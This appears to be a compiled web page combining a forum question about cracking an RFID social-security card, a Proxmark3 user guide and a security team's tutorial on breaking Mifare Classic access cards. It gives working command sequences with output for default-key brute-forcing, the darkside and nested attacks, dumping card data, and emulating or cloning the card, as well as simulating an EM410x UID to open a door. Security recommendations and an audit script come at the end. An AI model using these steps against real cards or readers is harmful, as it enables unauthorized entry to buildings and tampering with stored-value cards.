Has anyone used a Proxmark3 to crack a social security card (Easy RFID)?

RFID development tool: Proxmark3
[Abstract: Introduction to Proxmark3. Proxmark3 is open-source hardware designed and developed by Jonathan Westhues, used mainly for sniffing, reading and cloning RFID tags. Its official sites: Jonathan Westhues' personal website; the Proxmark3 official site PROXMARK.org; Proxmark3 sales]
Proxmark3 introduction
Proxmark3 is open-source hardware designed and developed by Jonathan Westhues, used mainly for sniffing, reading and cloning RFID tags. Its official sites are Jonathan Westhues' personal website, the Proxmark3 official site (PROXMARK.org) and the Proxmark3 sales website.
The proxmark3 is a powerful general purpose RFID tool, the size of a deck of cards, designed to snoop, listen and emulate everything from Low Frequency (125kHz) to High Frequency (13.56MHz) tags.
From the original website:
This device can do almost anything involving almost any kind of low (125 kHz) or high (13.56 MHz) frequency RFID tag. It can act as a reader. It can eavesdrop on a transaction between another reader and a tag. It can analyse the signal received over the air more closely, for example to perform an attack in which we derive information from the tag's instantaneous power consumption. It can pretend to be a tag itself. It is also capable of some less obviously useful operations that might come in handy for development work.
Introduction
This section dives in more detail into the Proxmark3 hardware. It does not go nearly as deep as advanced electronics experts would like, but you are welcome to improve this description by providing your own material.
Proxmark3 capabilities
CPU : ARM, 256kB of flash memory, 64kB of RAM
FPGA : Xilinx Spartan-II
Two independent RF circuits, HF and LF
Power : through USB port
Connectivity : mini-USB port
User interface : one button, four LEDs.
Fully open-source design, both HW and SW
Basically, and unless proven otherwise, the idea is that the FPGA is just powerful enough to do the low level modulation/demodulation (-A, -B, ASK, OOK, etc), whereas the CPU should handle the coding/decoding of the frames (Manchester, Miller, etc) as well as more advanced functions.
Proxmark3 links:
/p/proxmark3/wiki/HomePage
/Proxmark/proxmark3/wiki
proxmark3 user guide (IThao123 weekly)
1. Hardware self-test
Normally a Proxmark3 you receive already has the latest official firmware flashed. When it is connected to the computer, all the LEDs light up once, then the three LEDs in the same row go out, then the last red LED goes out, and at the same time the relay gives an audible click. This means the board is working properly.
2. Installing the driver (Windows XP)
Open My Computer > right-click > Properties > Hardware > Device Manager > Human Interface Devices.
The "HID-compliant device" entry is our Proxmark3. Select "USB Human Interface Device" (usually the last entry; note: not "HID-compliant device") and update its driver.
Click Next to finish the installation. Afterwards the new Proxmark3 driver is visible in Device Manager.
3. Installing the software (Windows XP)
Two packages are commonly used. Open /p/proxmark3/downloads/list and, for Windows, download proxmark3_win_bins_beta.zip; unpack it and run proxmark3.exe from proxmark3_win_bins/bin.
To get the latest version of the software, however, it is best to also download ProxSpace-0.7z and install TortoiseSVN locally (official download: http://tortoisesvn.net/downloads; a Simplified Chinese build is available elsewhere). Unpack the archive, then edit runme.bat in its root directory and set the environment variable to the directory you unpacked into; mine is (set MYPATH=C:\hack\RFID\ProxSpace).
Then double-click runme.bat and type make to build the latest client. It is best to first right-click the pm3 directory and choose SVN Update (mine is the Chinese SVN build); if this is your first time using SVN, enter the official Google SVN URL /svn/trunk/ and wait for the update to finish.
Then build: run runme.bat and enter the command make.
ProxSpace\pm3\client now contains the latest executables, including proxmark3.exe, snooper.exe, flasher.exe and cli.exe. You can copy them over the ones in proxmark3_win_bins\bin that you downloaded from the official site. At that point you may get an error about a missing libpthread-2.dll; copy it from ProxSpace\mingw\bin, and the latest programs will then run from your original program directory.
4. Using the software (Windows XP)
4.1 Basic use. Antenna voltage test command: hw tune (best run with no card on the antenna).
To measure the high-frequency voltage continuously use hf tune; press the button on the board to stop. A voltage above 5 V is generally enough for normal use.
4.2 High frequency
To read a Mifare high-frequency card, place a card on the Proxmark3 antenna and enter: hf 14a reader
Enter hf 14a snoop, then open the card-operation software to capture the RFID communication:
Then enter hf 14a list to view the captured data.
View the data of the first sector: hf mf rdbl 0 a ffffffffffff (the twelve f's are the key)
Mifare key-cracking demo: enter hf mf mifare
This yields an Nt value; then run the next step, hf mf fea1b170, which recovers the default key a0a1a2a3a4a5.
The Mifare-related commands are:
proxmark3> hf mf
Set default debug mode
Read MIFARE classic block (read one block of a Mifare card)
Read MIFARE classic sector (read one sector of a Mifare card)
Write MIFARE classic block (write one block of a Mifare card)
Test block up to 8 keys
Read parity error messages. param - <used card nonce> (this is the "darkside" attack)
Test nested authentication (the nested command; it requires one known key)
Simulate MIFARE 1k card (emulate a card)
Clear simulator memory block (clear the emulator memory)
Set simulator memory block (set the emulator memory)
Get simulator memory block (read the emulator memory)
Load from file emul dump (load a dump file)
Save to file emul dump (save a dump file)
Fill simulator memory with help of keys from simulator (fill in keys)
Print keys from simulator memory (print keys)
For more operations see /p/proxmark3/wiki/Mifare
4.3 Low frequency
Step 1: read an EM41x low-frequency card; enter: lf em4x em410xwatch
Step 2: with the UID in hand, go to the door controller or verification point and hold the low-frequency antenna against the reader:
lf em4x em410xsim <Tag uid>
<Tag uid> is the ID recovered in the screenshot; once the "send data" prompt appears, the door opens within a few seconds.
Enter lf to list the low-frequency commands.
For more, see the official Proxmark3 Google Code help documentation at /p/proxmark3/wiki/HomePage?tm=6

RFID Hacking ④: Cracking Access Control with the ProxMark3 - Tuicool
RFID Hacking ④: Cracking Access Control with the ProxMark3
t @ 漏洞盒子 (Vulbox) Security Team
Some of the techniques mentioned in this article may be offensive in nature; they are provided for security study and teaching only, and illegal use is forbidden!
One of the traditions of the international hacker conference Defcon is lock picking, because hackers regard a lock as just another security challenge. In hacker-themed films and TV series we often see the hero or heroine use superb hacking skills to break into a target company's network, or even use social engineering to get past access control, slip into the target's offices and mount a physical attack as if walking through an empty house (Agents of S.H.I.E.L.D., Mr. Robot and Who Am I all seem to have such scenes).
Against this background one cannot help asking: the access-control system is a company's first physical barrier, so has the security of this hardware infrastructure been ignored all along?
0x01 Preparation
For setting up the environment on Linux or Windows, see:
1.1 Entering the PM3 terminal
./proxmark3 /dev/ttyACM0
1.2 Testing the antennas
```
proxmark3> hw tune
# LF antenna: 29.98 V @   125.00 kHz
# LF antenna: 30.39 V @   134.00 kHz
# LF optimal: 36.30 V @   129.03 kHz
# HF antenna: 27.90 V @
proxmark3>
```
1.3 Device firmware
```
proxmark3> hw ver
#db# Prox/RFID mark3 RFID instrument
#db# bootrom: /-suspect
#db# os: /-suspect
#db# HF FPGA image built on  at 08:41:42
```
0x02 Brute-forcing and enumerating keys
2.1 Reading the card
```
proxmark3> hf 14a reader
ATQA : 04 00
UID : 2c f0 55 0b
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443a-4 card found, RATS not supported
```
2.2 Run the NESTED attack, enumerating and brute-forcing keys:
```
proxmark3> hf mf chk *1 ? t
No key specified,try default keys
chk default key[0] ffffffffffff
chk default key[1]
chk default key[2] a0a1a2a3a4a5
chk default key[3] b0b1b2b3b4b5
chk default key[4] aabbccddeeff
chk default key[5] 4d3a99c351dd
chk default key[6] 1a982c7e459a
chk default key[7] d3f7d3f7d3f7
chk default key[8] 714c5c886e97
chk default key[9] 587ee5f9350f
chk default key[10] a
chk default key[11] 533cb6c723f6
chk default key[12] 8fd0a4f256e9
--SectorsCnt:0 block no:0x03 key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:1 block no:0x07 key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:2 block no:0x0b key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:3 block no:0x0f key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:4 block no:0x13 key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:5 block no:0x17 key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:6 block no:0x1b key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:7 block no:0x1f key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:8 block no:0x23 key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:9 block no:0x27 key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:10 block no:0x2b key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:11 block no:0x2f key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:12 block no:0x33 key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:13 block no:0x37 key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:14 block no:0x3b key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:15 block no:0x3f key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:0 block no:0x03 key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:1 block no:0x07 key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:2 block no:0x0b key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:3 block no:0x0f key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:4 block no:0x13 key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:5 block no:0x17 key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:6 block no:0x1b key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:7 block no:0x1f key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:8 block no:0x23 key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:9 block no:0x27 key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:10 block no:0x2b key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:11 block no:0x2f key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:12 block no:0x33 key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:13 block no:0x37 key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:14 block no:0x3b key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:15 block no:0x3f key type:B key count:13
Found valid key:[ffffffffffff]
proxmark3>
```
The card's keys were obtained successfully.
2.3 Exploiting the PRNG weakness: the Mifare "DarkSide" attack
```
proxmark3> hf mf mifare
-------------------------------------------------------------------------
Executing command. Expected execution time: 25sec on average
Press the key on the proxmark3 device to abort both proxmark3 and client.
-------------------------------------------------------------------------
uid(2cf0550b) nt(218e1cd8) par(0000) ks(090a070d060b0501) nr()
|diff|{nr}    |ks3|ks3^5|parity         |
+----+--------+---+-----+---------------+
| 00 |        |   |  c  |0,0,0,0,0,0,0,0|
| 20 |        | a |  f  |0,0,0,0,0,0,0,0|
| 40 |        |   |  2  |0,0,0,0,0,0,0,0|
| 60 |        | d |  8  |0,0,0,0,0,0,0,0|
| 80 |        |   |  3  |0,0,0,0,0,0,0,0|
| a0 |        | b |  e  |0,0,0,0,0,0,0,0|
| c0 |        | 5 |  0  |0,0,0,0,0,0,0,0|
| e0 |        | 1 |  4  |0,0,0,0,0,0,0,0|
parity is all zero,try special attack!just wait for few more seconds...
key_count:0
Key not found (lfsr_common_prefix list is null). Nt=218e1cd8
Failing is expected to happen in 25% of all cases. Trying again with a different reader nonce...
uid(2cf0550b) nt(218e1cd8) par(0000) ks(0dc04) nr()
|diff|{nr}    |ks3|ks3^5|parity         |
+----+--------+---+-----+---------------+
| 00 |        | d |  8  |0,0,0,0,0,0,0,0|
| 20 |        |   |  1  |0,0,0,0,0,0,0,0|
| 40 |        |   |  2  |0,0,0,0,0,0,0,0|
| 60 |        |   |  6  |0,0,0,0,0,0,0,0|
| 80 |        | d |  8  |0,0,0,0,0,0,0,0|
| a0 |        | 7 |  2  |0,0,0,0,0,0,0,0|
| c0 |        | c |  9  |0,0,0,0,0,0,0,0|
| e0 |        | 4 |  1  |0,0,0,0,0,0,0,0|
parity is all zero,try special attack!just wait for few more seconds...
key_count:0
Key not found (lfsr_common_prefix list is null). Nt=218e1cd8
Failing is expected to happen in 25% of all cases. Trying again with a different reader nonce...
uid(2cf0550b) nt(218e1cd8) par(0000) ks(0d040e0e0c010e00) nr()
|diff|{nr}    |ks3|ks3^5|parity         |
+----+--------+---+-----+---------------+
| 00 |        | d |  8  |0,0,0,0,0,0,0,0|
| 20 |        |   |  1  |0,0,0,0,0,0,0,0|
| 40 |        | e |  b  |0,0,0,0,0,0,0,0|
| 60 |        | e |  b  |0,0,0,0,0,0,0,0|
| 80 |        | c |  9  |0,0,0,0,0,0,0,0|
| a0 |        | 1 |  4  |0,0,0,0,0,0,0,0|
| c0 |        | e |  b  |0,0,0,0,0,0,0,0|
| e0 |        | 0 |  5  |0,0,0,0,0,0,0,0|
parity is all zero,try special attack!just wait for few more seconds...
p1:0 p2:0 p3:0 key:ffffffffffff
p1:29e5f p2:18a2b p3:1 key:b8b2a3c07af9
p1:2ba97 p2:19a40 p3:2 key:b5ba0002b5ea
p1:2c3fd p2:19fb9 p3:3 key:b4b979ba49de
p1:3de0e p2:2 key:968a7a09c714
p1:3fdf4 p2:25a7a p3:5 key:931b36c268ed
p1:54f81 p2:3 key:6ecaf371a99d
p1:58b75 p2:3 key:b
p1:616dd p2:3998a p3:8 key:59747d7fdf41
p1:6ab54 p3:9 key:56476bbef406
p1:64ae0 p2:3b844 p3:a key:53dc6ee57a91
p1:6dc19 p2:40e78 p3:b key:4
p1:708f8 p2:42956 p3:c key:3f83eb143dd6
p1:7abf0 p2:48987 p3:d key:2e2b8565f96b
p1:7b298 p2:48d82 p3:e key:2d70e3e30b
p2:4e219 p3:f key:1e238b63e204
p1:8ce60 p2:5 key:0f4b7cb380a5
key_count:17
------------------------------------------------------------------
Key found:ffffffffffff
Found valid key:ffffffffffff
proxmark3>
```
With this method the card key can be obtained as well, but it often comes down to luck, because not every card has this weakness. If the PRNG weakness is absent, we have to recover the key by sniffing the packets exchanged between the card and the reader.
For the method of sniffing the traffic with the PM3 as a man in the middle, see:
, and the RadioWar team's
0x03 Dumping the card data and processing it
With the methods above we obtained the card's keys; now we can use them to export all the data on the card (dumpdata):
```
proxmark3> hf mf nested 1 0 A ffffffffffff d
--block no:00 key type:00 key:ff ff ff ff ff ff
Block shift=0
Testing known keys. Sector count=16
Time in nested: 0.030 (inf sec per key)
-----------------------------------------------
Iterations count: 0
|---|----------------|---|----------------|---|
|sec|key A           |res|key B           |res|
|---|----------------|---|----------------|---|
|000|  ffffffffffff  |   |  ffffffffffff  |   |
|001|  ffffffffffff  |   |  ffffffffffff  |   |
|002|  ffffffffffff  |   |  ffffffffffff  |   |
|003|  ffffffffffff  |   |  ffffffffffff  |   |
|004|  ffffffffffff  |   |  ffffffffffff  |   |
|005|  ffffffffffff  |   |  ffffffffffff  |   |
|006|  ffffffffffff  |   |  ffffffffffff  |   |
|007|  ffffffffffff  |   |  ffffffffffff  |   |
|008|  ffffffffffff  |   |  ffffffffffff  |   |
|009|  ffffffffffff  |   |  ffffffffffff  |   |
|010|  ffffffffffff  |   |  ffffffffffff  |   |
|011|  ffffffffffff  |   |  ffffffffffff  |   |
|012|  ffffffffffff  |   |  ffffffffffff  |   |
|013|  ffffffffffff  |   |  ffffffffffff  |   |
|014|  ffffffffffff  |   |  ffffffffffff  |   |
|015|  ffffffffffff  |   |  ffffffffffff  |   |
|---|----------------|---|----------------|---|
Printing keys to bynary file dumpkeys.bin...
proxmark3>
```
During this step a dumpkeys.bin file was created in the PM3 working directory:
Next, running hf mf dump gives us the data of the whole card:
```
proxmark3> hf mf dump
|-----------------------------------------|
|------ Reading sector access bits...-----|
|-----------------------------------------|
Command execute timeout
Sending bytes to proxmark failed
#db# READ BLOCK FINISHED
[the line above is repeated 15 times in all while the sector trailers are read]
|-----------------------------------------|
|----- Dumping all blocks to file... -----|
|-----------------------------------------|
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
[the two lines above are repeated once for each of the 64 blocks]
proxmark3>
```
At this point the card data has been exported to the binary file dumpdata.bin in the PM3 home directory:
But the PM3 cannot recognise or use a binary file directly; we still need a script to convert it into text in eml format:
```
proxmark3> script run dumptoemul.lua
--- Executing: ./scripts/dumptoemul.lua, args''
Wrote an emulator-dump to the file 2CF0550B.eml
-----Finished
proxmark3>
```
The dumptoemul script converted the binary dumpdata.bin into an eml file named after the card's ID:
Let us compare the two files:
The effect is obvious: the script turned the unreadable binary file into plain text.
What dumptoemul.lua does can also be implemented in Python: bin2text.py
```python
#!/usr/bin/python
from __future__ import with_statement
import sys
import binascii

READ_BLOCKSIZE = 16  # one MIFARE Classic block (16 bytes) per output line


def main(argv):
    argc = len(argv)
    if argc < 3:
        print('Usage: %s dumpdata.bin output.txt' % argv[0])
        sys.exit(1)
    # open() instead of the Python-2-only file(); the dump is read in binary mode
    with open(argv[1], "rb") as file_inp, open(argv[2], "w") as file_out:
        while True:
            byte_s = file_inp.read(READ_BLOCKSIZE)
            if not byte_s:
                break  # end of the dump
            hex_char_repr = binascii.hexlify(byte_s).decode("ascii")
            file_out.write(hex_char_repr)
            file_out.write("\n")


if __name__ == '__main__':
    main(sys.argv)
```
```
python bin2text.py dumpdata.bin output.txt
mv output.txt 2CF0550B.eml
```
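As an added example (Python 3; neither the article's script nor the Proxmark3 project's code), the following audits a 1K dumpdata.bin the way a defender would after the hf mf chk and hf mf dump steps above: it converts the dump to the same one-hex-line-per-block eml text as dumptoemul.lua, checks that the BCC in block 0 matches the UID, reports every sector whose trailer still holds one of the default keys from the hf mf chk list, and verifies the redundancy of the three access-condition bytes. The sample dump is constructed inline; the sector-5 keys and the offsets used are assumptions.

```python
import binascii

# Default keys the transcript's "hf mf chk" tries (its truncated entries omitted).
DEFAULT_KEYS = {
    "ffffffffffff", "a0a1a2a3a4a5", "b0b1b2b3b4b5", "aabbccddeeff",
    "4d3a99c351dd", "1a982c7e459a", "d3f7d3f7d3f7", "714c5c886e97",
    "587ee5f9350f", "533cb6c723f6", "8fd0a4f256e9",
}
BLOCK = 16      # bytes per MIFARE Classic block
BLOCKS_1K = 64  # 16 sectors x 4 blocks; the 4th block of each sector is its trailer

def access_bits_ok(trailer):
    """Trailer bytes 6-8 store the access conditions C1..C3 once plain and once
    inverted; a trailer failing this check is corrupt and would lock the sector."""
    b6, b7, b8 = trailer[6], trailer[7], trailer[8]
    c1, c2, c3 = b7 >> 4, b8 & 0xF, b8 >> 4
    return ((b6 & 0xF) == (~c1 & 0xF) and (b6 >> 4) == (~c2 & 0xF)
            and (b7 & 0xF) == (~c3 & 0xF))

def dump_to_eml(dump):
    """Same conversion as dumptoemul.lua: one hex line per 16-byte block."""
    lines = [binascii.hexlify(dump[i:i + BLOCK]).decode("ascii")
             for i in range(0, len(dump), BLOCK)]
    return "\n".join(lines) + "\n"

def audit_dump(dump):
    """UID/BCC consistency, sectors still on a default key, inconsistent trailers."""
    if len(dump) != BLOCKS_1K * BLOCK:
        raise ValueError("expected a 1024-byte MIFARE Classic 1K dump")
    uid = dump[0:4]
    report = {"uid": binascii.hexlify(uid).decode("ascii"),
              "bcc_ok": dump[4] == (uid[0] ^ uid[1] ^ uid[2] ^ uid[3]),
              "default_key_sectors": [], "bad_access_bits": []}
    for sector in range(BLOCKS_1K // 4):
        start = (sector * 4 + 3) * BLOCK
        trailer = dump[start:start + BLOCK]
        key_a = binascii.hexlify(trailer[0:6]).decode("ascii")
        key_b = binascii.hexlify(trailer[10:16]).decode("ascii")
        if key_a in DEFAULT_KEYS or key_b in DEFAULT_KEYS:
            report["default_key_sectors"].append(sector)
        if not access_bits_ok(trailer):
            report["bad_access_bits"].append(sector)
    return report

def build_sample_dump():
    """Constructed 1K dump: the article's UID 2cf0550b, factory trailer in every
    sector except sector 5, which carries hypothetical custom keys."""
    dump = bytearray(BLOCKS_1K * BLOCK)
    uid = bytes.fromhex("2cf0550b")
    bcc = uid[0] ^ uid[1] ^ uid[2] ^ uid[3]
    dump[0:BLOCK] = uid + bytes([bcc, 0x08, 0x04, 0x00]) + bytes(8)  # block 0
    factory = bytes.fromhex("ffffffffffff" "ff078069" "ffffffffffff")
    custom = bytes.fromhex("0123456789ab" "787788c1" "a1b2c3d4e5f6")
    for sector in range(BLOCKS_1K // 4):
        start = (sector * 4 + 3) * BLOCK
        dump[start:start + BLOCK] = custom if sector == 5 else factory
    return bytes(dump)
```

Run audit_dump() over the bytes of a real dumpdata.bin to get the same report for your own cards; a non-empty default_key_sectors list is exactly the condition the security recommendations at the end of the article warn against.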
Clear the emulator memory blocks:
hf mf eclr
Load the data exported from the card into the PM3:
```
proxmark3> hf mf eload 2CF0550B
Loaded 64 blocks from file: 2CF0550B.eml
```
Simulate the access card with the PM3:
```
proxmark3> hf mf sim
uid:N/A, numreads:0, flags:0 (0x00)
#db# 4B UID: 2CF0550B
proxmark3>
```
Now the PM3 can be used to get through the access control. Alternatively, clone the data exported from the card out of the PM3's memory onto a blank card and use the cloned card instead:
```
proxmark3> hf mf cload e
Cant get block: 1
```
0x04 Security recommendations
At present about 80% of access-control products in China use the raw UID of the IC card or the ID of the ID card as the credential, with no encrypted authentication and no dedicated keys. This is a far greater risk than a Mifare crack: an attacker needs only standard technical means to complete the whole process.
Access-control vendors and administrators: put proper protections in place and raise security awareness; avoid default keys and weak keys; use authentication and verification between card and reader, and never use the raw UID of an IC card or the ID of an ID card directly as the credential!
Users: keep your access card safe and avoid leaking its data.
With the rapid growth of the Internet of Things, wireless communication technologies are ever more widely used. This article used only an access-control case to expose some of the security risks in NFC and RFID protocols and technologies.
There are real cases in everyday life too: in 2010 the Beijing Yikatong transit card was reported to have a vulnerability that allowed the stored balance to be changed at will; my guess is that this was most likely done by exploiting the Mifare PRNG weakness. In 2014 a foreign security researcher found that Taiwan's EasyCard, used on its rail and bus systems, had the same PRNG weakness allowing the balance to be modified, and reported it to the EasyCard company: